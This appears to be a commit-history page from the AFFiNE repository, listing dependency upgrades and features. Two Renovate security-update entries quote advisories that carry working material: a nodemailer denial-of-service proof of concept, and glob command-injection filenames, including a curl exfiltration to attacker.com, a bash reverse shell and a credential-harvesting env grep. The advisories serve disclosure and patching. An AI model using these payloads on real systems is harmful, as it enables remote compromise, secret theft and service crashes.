<summary>storybookjs/storybook (storybook)</summary> ### [`v10.1.10`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#10110) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.9...v10.1.10) - Core: Fix `.env`-file parsing - [#​33383](https://redirect.github.com/storybookjs/storybook/pull/33383), thanks [@​JReinhold](https://redirect.github.com/JReinhold)! - Next.js: Handle v14 compatibility for draftMode import - [#​33341](https://redirect.github.com/storybookjs/storybook/pull/33341), thanks [@​tanujbhaud](https://redirect.github.com/tanujbhaud)! ### [`v10.1.9`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#1019) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.8...v10.1.9) - Telemetry: Remove instance of check for sub-error handling - [#​33356](https://redirect.github.com/storybookjs/storybook/pull/33356), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! ### [`v10.1.8`](https://redirect.github.com/storybookjs/storybook/compare/v10.1.7...7cd0cbca4ee2f2c082c9876de2fb2feba6c12bbf) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.7...v10.1.8) ### [`v10.1.7`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#1017) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.6...v10.1.7) - Automigrate: Fix missing await - [#​33333](https://redirect.github.com/storybookjs/storybook/pull/33333), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! - CLI: Remove REACT\_PROJECT projectType - [#​33334](https://redirect.github.com/storybookjs/storybook/pull/33334), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! - Core: Exclude open from pre-bundling to make local xdg-open reachable - [#​33325](https://redirect.github.com/storybookjs/storybook/pull/33325), thanks [@​Sidnioulz](https://redirect.github.com/Sidnioulz)! - Nextjs-Vite: Install `vite` during migration if not installed yet - [#​33316](https://redirect.github.com/storybookjs/storybook/pull/33316), thanks [@​ghengeveld](https://redirect.github.com/ghengeveld)! - Telemetry: Fix race condition in telemetry cache causing malformed JSON - [#​33323](https://redirect.github.com/storybookjs/storybook/pull/33323), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! ### [`v10.1.6`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#1016) [Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v10.1.5...v10.1.6) - Manager: Do not display non-existing shortcuts in the settings page - [#​32711](https://redirect.github.com/storybookjs/storybook/pull/32711), thanks [@​DKER2](https://redirect.github.com/DKER2)! - Preview: Enforce inert body if manager is focus-trapped - [#​33186](https://redirect.github.com/storybookjs/storybook/pull/33186), thanks [@​Sidnioulz](https://redirect.github.com/Sidnioulz)! - Telemetry: Await pending operations in getLastEvents to prevent race conditions - [#​33285](https://redirect.github.com/storybookjs/storybook/pull/33285), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic)! - UI: Fix keyboard navigation bug for "reset" option in `Select` - [#​33268](https://redirect.github.com/storybookjs/storybook/pull/33268), thanks [@​Sidnioulz](https://redirect.github.com/Sidnioulz)! </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi41OS4wIiwidXBkYXRlZEluVmVyIjoiNDIuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
DarkSky
|
844b9d9592 | feat(server): impl native reader for server (#14100) | ||
|
Xun Sun
|
a0eeed0cdb |
feat: implement export as PDF (#14057)
I used [pdfmake](https://www.npmjs.com/package/pdfmake) to implement an "export as PDF" feature, and I am happy to share with you! This should fix #13577, fix #8846, and fix #13959. A showcase: [Getting Started.pdf](https://github.com/user-attachments/files/24013057/Getting.Started.pdf) Although it might miss rendering some properties currently, it can evolve in the long run and provide a more native experience for the users. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** - Experimental "Export to PDF" option added to the export menu (behind a feature flag) - PDF export supports headings, paragraphs, lists, code blocks, tables, images, callouts, linked documents and embedded content * **Chores** - Added PDF rendering library and consolidated PDF utilities - Feature flag introduced to control rollout * **Tests** - Comprehensive unit tests added for PDF content rendering logic <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
Fangdun Tsai
|
246e09e0cd |
fix: roll back electron version to v35 (#14089)
In electron v36, all workers do not work. The webpack configuration is too complicated, so go back first. If start a new project with [forge](https://www.electronforge.io/) and latest electron, the worker works well. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Downgraded the Electron development/runtime used for building and testing the desktop app from v36 to v35; this is a development-environment change with no functional or API changes affecting end users. <sub>✏️ Tip: You can customize this high-level summary in your review settings.</sub> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
cb0ff04efa | feat: bump more deps (#14079) | ||
|
DarkSky
|
40f3337d45 |
feat: bump deps (#14076)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Chores**
* Updated core dependencies, developer tooling and Rust toolchain to
newer stable versions across the repo
* Upgraded Storybook to v10 and improved ESM path resolution for
storybook tooling
* Broadened native binding platform/architecture support and
strengthened native module version validation, loading and WASI handling
* **New Features**
* Exposed an additional native text export for consumers (enhanced
JS/native surface)
<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
DarkSky
|
027f741ed6 |
chore: bump deps (#14065)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit
* **Chores**
* Updated dependency versions across the monorepo (notably zod →
^3.25.76 and vitest-related packages → ^3.2.4), plus minor package bumps
to align tooling and libraries. These are manifest/test-tooling updates
only; no public API, behavior, or end-user features were changed.
<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
|
||
|
renovate[bot]
|
903e0c4d71 |
chore: bump up nodemailer version to v7.0.11 [SECURITY] (#14062)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`7.0.9` -> `7.0.11`](https://renovatebot.com/diffs/npm/nodemailer/7.0.9/7.0.11) |  |  | ### GitHub Vulnerability Alerts #### [GHSA-rcmh-qjqh-p98v](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v) ### Summary A DoS can occur that immediately halts the system due to the use of an unsafe function. ### Details According to **RFC 5322**, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list. However, the code implemented for this flattening process can be exploited by malicious input and triggers DoS RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group. At the following location in lib/addressparser/index.js: https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90 there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header: ```g0: g1: g2: g3: ... gN: victim@example.com;``` Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern `addressparser → _handleAddress → addressparser → ...` for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service. The problematic code section is as follows: ```js if (isGroup) { ... if (data.group.length) { let parsedGroup = addressparser(data.group.join(',')); // <- boom! parsedGroup.forEach(member => { if (member.group) { groupMembers = groupMembers.concat(member.group); } else { groupMembers.push(member); } }); } } ``` `data.group` is expected to contain members separated by commas, but in the attacker’s payload the group contains colon `(:)` tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number. ### PoC ``` const nodemailer = require('nodemailer'); function buildDeepGroup(depth) { let parts = []; for (let i = 0; i < depth; i++) { parts.push(`g${i}:`); } return parts.join(' ') + ' user@example.com;'; } const DEPTH = 3000; // <- control depth const toHeader = buildDeepGroup(DEPTH); console.log('to header length:', toHeader.length); const transporter = nodemailer.createTransport({ streamTransport: true, buffer: true, newline: 'unix' }); console.log('parsing start'); transporter.sendMail( { from: 'test@example.com', to: toHeader, subject: 'test', text: 'test' }, (err, info) => { if (err) { console.error('error:', err); } else { console.log('finished :', info && info.envelope); } } ); ``` As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately. ### Impact The attacker can achieve the following: 1. Force an immediate crash of any server/service that uses Nodemailer 2. Kill the backend process with a single web request 3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion” --- ### Release Notes <details> <summary>nodemailer/nodemailer (nodemailer)</summary> ### [`v7.0.11`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#7011-2025-11-26) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.10...v7.0.11) ##### Bug Fixes - prevent stack overflow DoS in addressparser with deeply nested groups ([b61b9c0]( |
||
|
DarkSky
|
f29e47e9d2 |
feat: improve oauth (#14061)
fix #13730 fix #12901 fix #14025 |
||
|
renovate[bot]
|
b7ebe3d0d6 |
chore: bump up glob version to v11.1.0 [SECURITY] (#13976)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [glob](https://redirect.github.com/isaacs/node-glob) | [`11.0.2` -> `11.1.0`](https://renovatebot.com/diffs/npm/glob/11.0.2/11.1.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2) ### Summary The glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c <command> <patterns>` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. ### Details **Root Cause:** The vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`: ```javascript stream.on('end', () => foregroundChild(cmd, matches, { shell: true })) ``` **Technical Flow:** 1. User runs `glob -c <command> <pattern>` 2. CLI finds files matching the pattern 3. Matched filenames are collected into an array 4. Command is executed with matched filenames as arguments using `shell: true` 5. Shell interprets metacharacters in filenames as command syntax 6. Malicious filenames execute arbitrary commands **Affected Component:** - **CLI Only:** The vulnerability affects only the command-line interface - **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected - **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems) **Attack Surface:** - Files with names containing shell metacharacters: `$()`, backticks, `;`, `&`, `|`, etc. - Any directory where attackers can control filenames (PR branches, archives, user uploads) - CI/CD pipelines using `glob -c` on untrusted content ### PoC **Setup Malicious File:** ```bash mkdir test_directory && cd test_directory # Create file with command injection payload in filename touch '$(touch injected_poc)' ``` **Trigger Vulnerability:** ```bash # Run glob CLI with -c option node /path/to/glob/dist/esm/bin.mjs -c echo "**/*" ``` **Result:** - The echo command executes normally - **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell - A new file `injected_poc` is created, proving command execution - Any command can be injected this way with full user privileges **Advanced Payload Examples:** **Data Exfiltration:** ```bash # Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1) touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)' ``` **Reverse Shell:** ```bash # Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1) touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)' ``` **Environment Variable Harvesting:** ```bash # Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt) touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)' ``` ### Impact **Arbitrary Command Execution:** - Commands execute with full privileges of the user running glob CLI - No privilege escalation required - runs as current user - Access to environment variables, file system, and network **Real-World Attack Scenarios:** **1. CI/CD Pipeline Compromise:** - Malicious PR adds files with crafted names to repository - CI pipeline uses `glob -c` to process files (linting, testing, deployment) - Commands execute in CI environment with build secrets and deployment credentials - Potential for supply chain compromise through artifact tampering **2. Developer Workstation Attack:** - Developer clones repository or extracts archive containing malicious filenames - Local build scripts use `glob -c` for file processing - Developer machine compromise with access to SSH keys, tokens, local services **3. Automated Processing Systems:** - Services using glob CLI to process uploaded files or external content - File uploads with malicious names trigger command execution - Server-side compromise with potential for lateral movement **4. Supply Chain Poisoning:** - Malicious packages or themes include files with crafted names - Build processes using glob CLI automatically process these files - Wide distribution of compromise through package ecosystems **Platform-Specific Risks:** - **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing - **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL - **Mixed Environments:** CI systems often use Linux containers regardless of developer platform ### Affected Products - **Ecosystem:** npm - **Package name:** glob - **Component:** CLI only (`src/bin.mts`) - **Affected versions:** v10.3.7 through v11.0.3 (and likely later versions until patched) - **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd` option) - **Patched versions:** 11.1.0 **Scope Limitation:** - **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe - **CLI-Specific:** Only the command-line interface with `-c/--cmd` option is vulnerable ### Remediation - Upgrade to `glob@11.1.0` or higher, as soon as possible. - If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead. - As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but ensure that no untrusted contents can possibly be encountered in the file path results. --- ### Release Notes <details> <summary>isaacs/node-glob (glob)</summary> ### [`v11.1.0`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.3...v11.1.0) [Compare Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.3...v11.1.0) ### [`v11.0.3`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.2...v11.0.3) [Compare Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.2...v11.0.3) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNzMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE3My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
DarkSky
|
46e7d9fab7 |
chore: bump electron (#13935)
fix #13647 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit ## Release Notes * **Chores** * Updated development tooling and build dependencies to latest stable versions * Increased minimum Node.js requirement to version 22 * Updated macOS deployment target to version 11.6 * Enhanced type safety and error handling in build processes <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Xun Sun
|
17ec76540b |
feat(editor): import docs from docx (#11774)
Support importing .docx files, as mentioned in https://github.com/toeverything/AFFiNE/issues/10154#issuecomment-2655744757 It essentially uses mammoth to convert the docx to html, and then imports the html with the standard steps. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Import Microsoft Word (.docx) files directly via the import dialog (creates new documents). * .docx added as a selectable file type in the file picker and import options. * **Localization** * Added localized labels and tooltips for DOCX import in English, Simplified Chinese, and Traditional Chinese. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
DarkSky
|
b7ac7caab4 |
chore(server): improve transcript stability (#13821)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Enhanced audio/video detection for MP4 files to better distinguish audio-only vs. video. * **Dependencies** * Added MP4 parsing dependency and updated AI provider libraries (Anthropic, Google, OpenAI, etc.). * **Bug Fixes** * Tightened authentication state validation for magic-link/OTP flows. * Stricter space-join validation to reject invalid client types/versions. * Improved transcript entry deduplication and data handling. * **API** * Transcript submit payload now requires infos and removes deprecated url/mimeType fields. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
renovate[bot]
|
1a9863d36f |
chore: bump up opentelemetry (#12651)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`^0.35.4` -> `^0.36.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.35.5/0.36.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.44.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.44.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.46.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.46.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/exporter-prometheus)</summary> ### [`v0.207.0`]( |
||
|
dependabot[bot]
|
35c2ad262f |
chore: bump next from 15.3.2 to 15.5.4 (#13739)
Bumps [next](https://github.com/vercel/next.js) from 15.3.2 to 15.5.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/vercel/next.js/releases">next's releases</a>.</em></p> <blockquote> <h2>v15.5.4</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: ensure onRequestError is invoked when otel enabled (<a href="https://redirect.github.com/vercel/next.js/issues/83343">#83343</a>)</li> <li>fix: devtools initial position should be from next config (<a href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)</li> <li>[devtool] fix overlay styles are missing (<a href="https://redirect.github.com/vercel/next.js/issues/83721">#83721</a>)</li> <li>Turbopack: don't match dynamic pattern for node_modules packages (<a href="https://redirect.github.com/vercel/next.js/issues/83176">#83176</a>)</li> <li>Turbopack: don't treat metadata routes as RSC (<a href="https://redirect.github.com/vercel/next.js/issues/82911">#82911</a>)</li> <li>[turbopack] Improve handling of symlink resolution errors in track_glob and read_glob (<a href="https://redirect.github.com/vercel/next.js/issues/83357">#83357</a>)</li> <li>Turbopack: throw large static metadata error earlier (<a href="https://redirect.github.com/vercel/next.js/issues/82939">#82939</a>)</li> <li>fix: error overlay not closing when backdrop clicked (<a href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>)</li> <li>Turbopack: flush Node.js worker IPC on error (<a href="https://redirect.github.com/vercel/next.js/issues/84077">#84077</a>)</li> </ul> <h3>Misc Changes</h3> <ul> <li>[CNA] use linter preference (<a href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>)</li> <li>CI: use KV for test timing data (<a href="https://redirect.github.com/vercel/next.js/issues/83745">#83745</a>)</li> <li>docs: september improvements and fixes (<a href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/yiminghe"><code>@yiminghe</code></a>, <a href="https://github.com/huozhi"><code>@huozhi</code></a>, <a href="https://github.com/devjiwonchoi"><code>@devjiwonchoi</code></a>, <a href="https://github.com/mischnic"><code>@mischnic</code></a>, <a href="https://github.com/lukesandberg"><code>@lukesandberg</code></a>, <a href="https://github.com/ztanner"><code>@ztanner</code></a>, <a href="https://github.com/icyJoseph"><code>@icyJoseph</code></a>, <a href="https://github.com/leerob"><code>@leerob</code></a>, <a href="https://github.com/fufuShih"><code>@fufuShih</code></a>, <a href="https://github.com/dwrth"><code>@dwrth</code></a>, <a href="https://github.com/aymericzip"><code>@aymericzip</code></a>, <a href="https://github.com/obendev"><code>@obendev</code></a>, <a href="https://github.com/molebox"><code>@molebox</code></a>, <a href="https://github.com/OoMNoO"><code>@OoMNoO</code></a>, <a href="https://github.com/pontasan"><code>@pontasan</code></a>, <a href="https://github.com/styfle"><code>@styfle</code></a>, <a href="https://github.com/HondaYt"><code>@HondaYt</code></a>, <a href="https://github.com/ryuapp"><code>@ryuapp</code></a>, <a href="https://github.com/lpalmes"><code>@lpalmes</code></a>, and <a href="https://github.com/ijjk"><code>@ijjk</code></a> for helping!</p> <h2>v15.5.3</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: validation return types of pages API routes (<a href="https://redirect.github.com/vercel/next.js/issues/83069">#83069</a>)</li> <li>fix: relative paths in dev in validator.ts (<a href="https://redirect.github.com/vercel/next.js/issues/83073">#83073</a>)</li> <li>fix: remove satisfies keyword from type validation to preserve old TS compatibility (<a href="https://redirect.github.com/vercel/next.js/issues/83071">#83071</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/bgub"><code>@bgub</code></a> for helping!</p> <h2>v15.5.2</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: disable unknownatrules lint rule entirely (<a href="https://redirect.github.com/vercel/next.js/issues/83059">#83059</a>)</li> <li>revert: add ?dpl to fonts in /_next/static/media (<a href="https://redirect.github.com/vercel/next.js/issues/83062">#83062</a>)</li> </ul> <h3>Credits</h3> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate[bot]
|
c18840038f |
chore: bump up @sentry/electron version to v7 (#13652)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@sentry/electron](https://redirect.github.com/getsentry/sentry-electron) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/@sentry%2felectron/6.6.0/7.2.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>getsentry/sentry-electron (@​sentry/electron)</summary> ### [`v7.2.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#720) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.1...7.2.0) - feat: Update JavaScript SDKs from [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) to [v10.17.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.17.0) - feat: Log os and device attributes ([#​1246](https://redirect.github.com/getsentry/sentry-electron/issues/1246)) ### [`v7.1.1`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#711) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.0...7.1.1) - fix: Preload injection path ([#​1243](https://redirect.github.com/getsentry/sentry-electron/issues/1243)) - fix: Preload `contextIsolation` issues ([#​1244](https://redirect.github.com/getsentry/sentry-electron/issues/1244)) - fix: Include `sentry.origin` with auto-generated logs ([#​1241](https://redirect.github.com/getsentry/sentry-electron/issues/1241)) ### [`v7.1.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#710) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.0.0...7.1.0) - feat: Update JavaScript SDKs from [v10.7.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.7.0) to [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) ([#​1236](https://redirect.github.com/getsentry/sentry-electron/issues/1236)) - feat: Optional Namespaced IPC ([#​1234](https://redirect.github.com/getsentry/sentry-electron/issues/1234)) - fix: Export `ErrorEvent` type ([#​1229](https://redirect.github.com/getsentry/sentry-electron/issues/1229)) - fix: Only capture logs if `enableLogs` is true ([#​1235](https://redirect.github.com/getsentry/sentry-electron/issues/1235)) ### [`v7.0.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#700) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.11.0...7.0.0) This release updates the underlying Sentry JavaScript SDKs to v10 which includes some breaking changes. Check out the the [migration guide](./MIGRATION.md) for more details. - feat: Update JavaScript SDKs to v10.8.0 ([#​1205](https://redirect.github.com/getsentry/sentry-electron/issues/1205)) ### [`v6.11.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6110) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.10.0...6.11.0) - feat: Update JavaScript SDKs from [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) to 